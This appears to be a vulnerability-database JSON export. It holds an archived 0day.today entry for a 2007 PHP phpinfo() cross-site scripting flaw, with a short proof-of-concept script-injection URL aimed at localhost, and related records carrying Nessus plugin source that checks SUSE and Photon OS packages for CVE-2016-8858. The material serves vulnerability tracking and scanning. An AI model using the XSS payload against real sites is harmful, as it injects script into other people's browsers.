{"hash": "3fabd05c44f2ea2ea0d5ecb95381da5b1de6a03a1e3a8be959e680ed37f5b280", "id": "1337DAY-ID-8858", "lastseen": "2018-02-06T07:18:35", "viewCount": 5, "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "70acaeeac90026e4dc2b5886298b0c21", "key": "description"}, {"hash": "36fd49eac63cd6543bfb79c94b2733e5", "key": "href"}, {"hash": "7c66fb2e378fc8b44f1ae3b9cd2ec3d8", "key": "modified"}, {"hash": "7c66fb2e378fc8b44f1ae3b9cd2ec3d8", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "ffe8bd05b67a518a7637c75f893f38e4", "key": "reporter"}, {"hash": "190402993310af030e860d39ca05d6f9", "key": "sourceData"}, {"hash": "605c36c35368cc2348485d764ef744e4", "key": "sourceHref"}, {"hash": "f62e8831c617e39f1b6e4c3b49fe46b8", "key": "title"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}], "bulletinFamily": "exploit", "cvss": {"score": 0.0, "vector": "NONE"}, "edition": 2, "enchantments": {"score": {"value": 1.5, "vector": "NONE", "modified": "2018-02-06T07:18:35"}, "dependencies": {"references": [{"type": "nessus", "idList": ["PHOTONOS_PHSA-2016-0014_LINUX.NASL", "PHOTONOS_PHSA-2016-0014.NASL", "OPENSUSE-2017-339.NASL", "SUSE_SU-2017-0607-3.NASL", "SUSE_SU-2017-0607-2.NASL", "SUSE_SU-2017-0607-1.NASL", "SUSE_SU-2017-0606-1.NASL", "SUSE_SU-2017-0603-1.NASL", "OPENSUSE-2017-184.NASL", "SUSE_SU-2017-0264-1.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310874121", "OPENVAS:1361412562310874113"]}, {"type": "aix", "idList": ["OPENSSH_ADVISORY10.ASC"]}, {"type": "gentoo", "idList": ["GLSA-201612-18"]}, {"type": "zdt", "idList": ["1337DAY-ID-19555"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:8858", "SECURITYVULNS:DOC:9261", "SECURITYVULNS:VULN:4891"]}], "modified": "2018-02-06T07:18:35"}, "vulnersScore": 1.5}, "type": "zdt", "sourceHref": "https://0day.today/exploit/8858", "description": "Exploit for multiple platform in category remote exploits", "title": "PHP 4.4.3 - 4.4.6 phpinfo() Remote XSS Vulnerability", "history": [{"bulletin": {"hash": "b083b17a4dff62a9e5cd6c1f48050f7428557b98b742d7b2e85941f66a89b92c", "id": "1337DAY-ID-8858", "lastseen": "2016-04-20T00:29:59", "enchantments": {"score": {"value": 2.6, "modified": "2016-04-20T00:29:59"}}, "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "ffe8bd05b67a518a7637c75f893f38e4", "key": "reporter"}, {"hash": "70acaeeac90026e4dc2b5886298b0c21", "key": "description"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}, {"hash": "f62e8831c617e39f1b6e4c3b49fe46b8", "key": "title"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "7c66fb2e378fc8b44f1ae3b9cd2ec3d8", "key": "published"}, {"hash": "7c66fb2e378fc8b44f1ae3b9cd2ec3d8", "key": "modified"}, {"hash": "4aa8432dcd8830d76851ad9cf9b58f56", "key": "href"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "b64b011a6a2d50b26144bceca294f475", "key": "sourceData"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "1036cb1dec36ad7f17f69bd65107dcc1", "key": "sourceHref"}], "bulletinFamily": "exploit", "history": [], "edition": 1, "type": "zdt", "sourceHref": "http://0day.today/exploit/8858", "description": "Exploit for multiple platform in category remote exploits", "viewCount": 1, "title": "PHP 4.4.3 - 4.4.6 phpinfo() Remote XSS Vulnerability", "cvss": {"score": 0.0, "vector": "NONE"}, "objectVersion": "1.0", "cvelist": [], "sourceData": "====================================================\r\nPHP 4.4.3 - 4.4.6 phpinfo() Remote XSS Vulnerability\r\n====================================================\r\n\r\n\r\n ////////////////////////////////////////////////////////////////////////\r\n // _ _ _ _ ___ _ _ ___ //\r\n // | || | __ _ _ _ __| | ___ _ _ ___ __| | ___ | _ \\| || || _ \\ //\r\n // | __ |/ _` || '_|/ _` |/ -_)| ' \\ / -_)/ _` ||___|| _/| __ || _/ //\r\n // |_||_|\\__,_||_| \\__,_|\\___||_||_|\\___|\\__,_| |_| |_||_||_| //\r\n // //\r\n // Proof of concept code from the Hardened-PHP Project //\r\n // (C) Copyright 2007 Stefan Esser //\r\n // //\r\n ////////////////////////////////////////////////////////////////////////\r\n // PHP 4 - phpinfo() XSS Testcase //\r\n ////////////////////////////////////////////////////////////////////////\r\n\r\nTo manually test for this vulnerability just call the phpinfo() page with a parameter like this.\r\n\r\nhttp://localhost/phpinfo.php?a[]=<script>alert(/XSS/);</script>\r\n\r\n\r\n\r\n\n# 0day.today [2016-04-19] #", "published": "2007-03-04T00:00:00", "references": [], "reporter": "Stefan Esser", "modified": "2007-03-04T00:00:00", "href": "http://0day.today/exploit/description/8858"}, "lastseen": "2016-04-20T00:29:59", "edition": 1, "differentElements": ["sourceHref", "sourceData", "href"]}], "objectVersion": "1.3", "cvelist": [], "sourceData": "====================================================\r\nPHP 4.4.3 - 4.4.6 phpinfo() Remote XSS Vulnerability\r\n====================================================\r\n\r\n\r\n ////////////////////////////////////////////////////////////////////////\r\n // _ _ _ _ ___ _ _ ___ //\r\n // | || | __ _ _ _ __| | ___ _ _ ___ __| | ___ | _ \\| || || _ \\ //\r\n // | __ |/ _` || '_|/ _` |/ -_)| ' \\ / -_)/ _` ||___|| _/| __ || _/ //\r\n // |_||_|\\__,_||_| \\__,_|\\___||_||_|\\___|\\__,_| |_| |_||_||_| //\r\n // //\r\n // Proof of concept code from the Hardened-PHP Project //\r\n // (C) Copyright 2007 Stefan Esser //\r\n // //\r\n ////////////////////////////////////////////////////////////////////////\r\n // PHP 4 - phpinfo() XSS Testcase //\r\n ////////////////////////////////////////////////////////////////////////\r\n\r\nTo manually test for this vulnerability just call the phpinfo() page with a parameter like this.\r\n\r\nhttp://localhost/phpinfo.php?a[]=<script>alert(/XSS/);</script>\r\n\r\n\r\n\r\n\n# 0day.today [2018-02-06] #", "published": "2007-03-04T00:00:00", "references": [], "reporter": "Stefan Esser", "modified": "2007-03-04T00:00:00", "href": "https://0day.today/exploit/description/8858"}

{"nessus": [{"lastseen": "2019-11-01T02:08:57", "bulletinFamily": "scanner", "description": "An update of the linux package has been released.", "modified": "2019-11-02T00:00:00", "id": "PHOTONOS_PHSA-2016-0014_LINUX.NASL", "href": "https://www.tenable.com/plugins/nessus/121658", "published": "2019-02-07T00:00:00", "title": "Photon OS 1.0: Linux PHSA-2016-0014", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.`\n#\n\n# The descriptive text and package checks in this plugin were\n# extracted from VMware Security Advisory PHSA-2016-0014. The text\n# itself is copyright (C) VMware, Inc.\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(121658);\n script_version(\"1.4\");\n script_cvs_date(\"Date: 2019/04/04 11:19:02\");\n\n script_cve_id(\"CVE-2016-8655\");\n\n script_name(english:\"Photon OS 1.0: Linux PHSA-2016-0014\");\n script_summary(english:\"Checks the rpm output for the updated packages.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote PhotonOS host is missing multiple security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"An update of the linux package has been released.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://github.com/vmware/photon/wiki/Security-Updates-14.md\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected Linux packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2016-8858\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'AF_PACKET chocobo_root Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/12/15\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/12/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/02/07\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:vmware:photonos:linux\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:vmware:photonos:1.0\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"PhotonOS Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/PhotonOS/release\", \"Host/PhotonOS/rpm-list\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/PhotonOS/release\");\nif (isnull(release) || release !~ \"^VMware Photon\") audit(AUDIT_OS_NOT, \"PhotonOS\");\nif (release !~ \"^VMware Photon (?:Linux|OS) 1\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"PhotonOS 1.0\");\n\nif (!get_kb_item(\"Host/PhotonOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"PhotonOS\", cpu);\n\nflag = 0;\n\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"linux-4.4.35-3.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"linux-debuginfo-4.4.35-3.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"linux-dev-4.4.35-3.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"linux-docs-4.4.35-3.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"linux-drivers-gpu-4.4.35-3.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"linux-esx-4.4.35-4.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"linux-esx-debuginfo-4.4.35-4.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"linux-esx-devel-4.4.35-4.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"linux-esx-docs-4.4.35-4.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"linux-oprofile-4.4.35-3.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"linux-sound-4.4.35-3.ph1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"linux\");\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-02-21T01:41:51", "bulletinFamily": "scanner", "description": "An update of [ openssh , linux ] packages for PhotonOS has been released.", "modified": "2019-02-07T00:00:00", "id": "PHOTONOS_PHSA-2016-0014.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=111848", "published": "2018-08-17T00:00:00", "title": "Photon OS 1.0: Linux / Openssh PHSA-2016-0014 (deprecated)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# @DEPRECATED@\n#\n# Disabled on 2/7/2019\n#\n\n# The descriptive text and package checks in this plugin were\n# extracted from VMware Security Advisory PHSA-2016-0014. The text\n# itself is copyright (C) VMware, Inc.\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(111848);\n script_version(\"1.4\");\n script_cvs_date(\"Date: 2019/02/07 18:59:50\");\n\n script_cve_id(\"CVE-2016-8655\", \"CVE-2016-8858\");\n\n script_name(english:\"Photon OS 1.0: Linux / Openssh PHSA-2016-0014 (deprecated)\");\n script_summary(english:\"Checks the rpm output for the updated packages.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"This plugin has been deprecated.\");\n script_set_attribute(attribute:\"description\", value:\n\"An update of [ openssh , linux ] packages for PhotonOS has been\nreleased.\");\n # https://github.com/vmware/photon/wiki/Security-Updates-14\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?22f925a3\");\n script_set_attribute(attribute:\"solution\", value:\"n/a.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2016-8858\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'AF_PACKET chocobo_root Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/12/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/08/17\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:vmware:photonos:linux\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:vmware:photonos:openssh\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:vmware:photonos:1.0\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"PhotonOS Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/PhotonOS/release\", \"Host/PhotonOS/rpm-list\");\n\n exit(0);\n}\n\nexit(0, \"This plugin has been deprecated.\");\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/PhotonOS/release\");\nif (isnull(release) || release !~ \"^VMware Photon\") audit(AUDIT_OS_NOT, \"PhotonOS\");\nif (release !~ \"^VMware Photon (?:Linux|OS) 1\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"PhotonOS 1.0\");\n\nif (!get_kb_item(\"Host/PhotonOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"PhotonOS\", cpu);\n\nflag = 0;\n\npkgs = [\n \"linux-4.4.35-3.ph1\",\n \"linux-debuginfo-4.4.35-3.ph1\",\n \"linux-dev-4.4.35-3.ph1\",\n \"linux-docs-4.4.35-3.ph1\",\n \"linux-drivers-gpu-4.4.35-3.ph1\",\n \"linux-esx-4.4.35-4.ph1\",\n \"linux-esx-debuginfo-4.4.35-4.ph1\",\n \"linux-esx-devel-4.4.35-4.ph1\",\n \"linux-esx-docs-4.4.35-4.ph1\",\n \"linux-oprofile-4.4.35-3.ph1\",\n \"linux-sound-4.4.35-3.ph1\",\n \"openssh-7.1p2-5.ph1\",\n \"openssh-debuginfo-7.1p2-5.ph1\"\n];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"PhotonOS-1.0\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"linux / openssh\");\n}\n", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2019-11-01T03:01:45", "bulletinFamily": "scanner", "description": "This update for openssh fixes the following issues :\n\n - CVE-2016-8858: prevent resource depletion during key\n exchange (bsc#1005480)\n\n - CVE-2016-10009: limit directories for loading PKCS11\n modules to avoid privilege escalation (bsc#1016366)\n\n - CVE-2016-10011: Prevent possible leaks of host private\n keys to low-privilege process handling authentication\n (bsc#1016369)\n\n - Fix suggested command for removing conflicting server\n keys from the known_hosts file (bsc#1006221)\n\n - Properly verify CIDR masks in the AllowUsers and\n DenyUsers configuration lists (bsc#1005893)\n\nThis update was imported from the SUSE:SLE-12:Update update project.", "modified": "2019-11-02T00:00:00", "id": "OPENSUSE-2017-339.NASL", "href": "https://www.tenable.com/plugins/nessus/97716", "published": "2017-03-14T00:00:00", "title": "openSUSE Security Update : openssh (openSUSE-2017-339)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2017-339.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(97716);\n script_version(\"3.2\");\n script_cvs_date(\"Date: 2019/04/10 16:10:18\");\n\n script_cve_id(\"CVE-2016-10009\", \"CVE-2016-10011\", \"CVE-2016-8858\");\n\n script_name(english:\"openSUSE Security Update : openssh (openSUSE-2017-339)\");\n script_summary(english:\"Check for the openSUSE-2017-339 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for openssh fixes the following issues :\n\n - CVE-2016-8858: prevent resource depletion during key\n exchange (bsc#1005480)\n\n - CVE-2016-10009: limit directories for loading PKCS11\n modules to avoid privilege escalation (bsc#1016366)\n\n - CVE-2016-10011: Prevent possible leaks of host private\n keys to low-privilege process handling authentication\n (bsc#1016369)\n\n - Fix suggested command for removing conflicting server\n keys from the known_hosts file (bsc#1006221)\n\n - Properly verify CIDR masks in the AllowUsers and\n DenyUsers configuration lists (bsc#1005893)\n\nThis update was imported from the SUSE:SLE-12:Update update project.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1005480\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1005893\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1006221\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1016366\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1016369\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected openssh packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:openssh\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:openssh-askpass-gnome\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:openssh-askpass-gnome-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:openssh-cavs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:openssh-cavs-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:openssh-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:openssh-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:openssh-fips\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:openssh-helpers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:openssh-helpers-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:42.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/03/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/03/14\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE42\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"42.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE42.1\", reference:\"openssh-6.6p1-17.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"openssh-askpass-gnome-6.6p1-17.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"openssh-askpass-gnome-debuginfo-6.6p1-17.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"openssh-cavs-6.6p1-17.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"openssh-cavs-debuginfo-6.6p1-17.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"openssh-debuginfo-6.6p1-17.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"openssh-debugsource-6.6p1-17.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"openssh-fips-6.6p1-17.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"openssh-helpers-6.6p1-17.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"openssh-helpers-debuginfo-6.6p1-17.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"openssh-askpass-gnome / openssh-askpass-gnome-debuginfo / openssh / etc\");\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-11-03T12:18:45", "bulletinFamily": "scanner", "description": "This update for openssh fixes the following issues :\n\n - CVE-2016-8858: prevent resource depletion during key\n exchange (bsc#1005480)\n\n - CVE-2016-10009: limit directories for loading PKCS11\n modules to avoid privilege escalation (bsc#1016366)\n\n - CVE-2016-10011: Prevent possible leaks of host private\n keys to low-privilege process handling authentication\n (bsc#1016369)\n\n - Fix suggested command for removing conflicting server\n keys from the known_hosts file (bsc#1006221)\n\n - Properly verify CIDR masks in the AllowUsers and\n DenyUsers configuration lists (bsc#1005893)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "modified": "2019-11-02T00:00:00", "id": "SUSE_SU-2017-0607-3.NASL", "href": "https://www.tenable.com/plugins/nessus/97653", "published": "2017-03-10T00:00:00", "title": "SUSE SLES12 Security Update : openssh (SUSE-SU-2017:0607-3)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2017:0607-3.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(97653);\n script_version(\"3.5\");\n script_cvs_date(\"Date: 2019/09/11 11:22:15\");\n\n script_cve_id(\"CVE-2016-10009\", \"CVE-2016-10011\", \"CVE-2016-8858\");\n\n script_name(english:\"SUSE SLES12 Security Update : openssh (SUSE-SU-2017:0607-3)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for openssh fixes the following issues :\n\n - CVE-2016-8858: prevent resource depletion during key\n exchange (bsc#1005480)\n\n - CVE-2016-10009: limit directories for loading PKCS11\n modules to avoid privilege escalation (bsc#1016366)\n\n - CVE-2016-10011: Prevent possible leaks of host private\n keys to low-privilege process handling authentication\n (bsc#1016369)\n\n - Fix suggested command for removing conflicting server\n keys from the known_hosts file (bsc#1006221)\n\n - Properly verify CIDR masks in the AllowUsers and\n DenyUsers configuration lists (bsc#1005893)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1005480\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1005893\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1006221\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1016366\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1016369\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-10009/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-10011/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-8858/\"\n );\n # https://www.suse.com/support/update/announcement/2017/suse-su-20170607-3/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?ba43d2fe\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use YaST online_update.\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Server 12-LTSS:zypper in -t patch\nSUSE-SLE-SERVER-12-2017-325=1\n\nTo bring your system up-to-date, use 'zypper patch'.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n 